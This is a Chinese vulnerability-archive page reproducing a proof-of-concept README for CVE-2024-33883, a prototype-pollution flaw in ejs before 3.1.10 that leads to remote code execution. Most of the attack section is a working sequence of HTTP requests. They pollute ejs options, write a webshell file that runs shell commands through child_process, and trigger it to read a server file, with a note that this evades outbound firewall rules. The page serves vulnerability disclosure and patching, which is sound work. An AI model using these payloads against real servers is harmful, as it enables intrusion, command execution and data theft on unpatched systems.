关联漏洞
标题:
ejs 安全漏洞
(CVE-2024-33883)
描述:Github ejs是嵌入式 JavaScript 模板。 ejs(Embedded JavaScript templates) 3.1.10之前版本存在安全漏洞,该漏洞源于缺乏一定的污染保护。
描述
PoC of CVE-2024-33883, RCE vulnerability of ejs.
介绍
# CVE-2024-33883
### ejs@3.1.9, Insufficient Prototype Pollution Validation Leading to RCE Exploitation
- With prototype pollution, set opts.client to truthy value (condition)
- Then, when render() runs, ejs will run opts.escapeFunction value as JS code.
## Vulnerable Code Range
Based on ejs@3.1.9
**1. ejs/lib/ejs.js - line 580, 636, 637**
## PoC (Inject webshell & activate)
```
1. GET /pollute?target=client&value=1
2. GET /pollute?target=escapeFunction&value=process.mainModule.require("fs").writeFileSync('./payload.js', "function RCE( key ){ \n const result = process.mainModule.require('child_process').execSync(`${key}`); \n throw new Error(`Result leak from Error: ${result.toString()}`); \n}\n module.exports = RCE;");
3. GET /
- Inject webshell
4. GET /pollute?target=escapeFunction&value=process.mainModule.require("./payload.js")("cat ./Leak_target");
5. GET /
- Activate webshell
```
- Above PoC can bypass outbound packet drop of ufw firewall.
- **All version under 3.1.10 is vulnerable for this type of attack.**
- This is RCE vulnerability, and do not abuse on live server.
## Attack available condition
1. Needs control of render().
2. Needs control of prototype pollution attack vector.
- Above two condition holds, RCE attack is available.
## How can I prevent this attack?
- Fixed version(ejs@3.1.10) is available now.
文件快照
[4.0K] /data/pocs/5617a74f646a192644e499a26ffd1967848bbe4c
├── [ 733] app.js
├── [ 104] Dockerfile
├── [4.0K] ejs
│ └── [ 39] index.ejs
├── [ 7] Leak_target
├── [ 382] package.json
├── [ 33K] package-lock.json
├── [ 194] payload.js
└── [1.3K] README.md
1 directory, 8 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。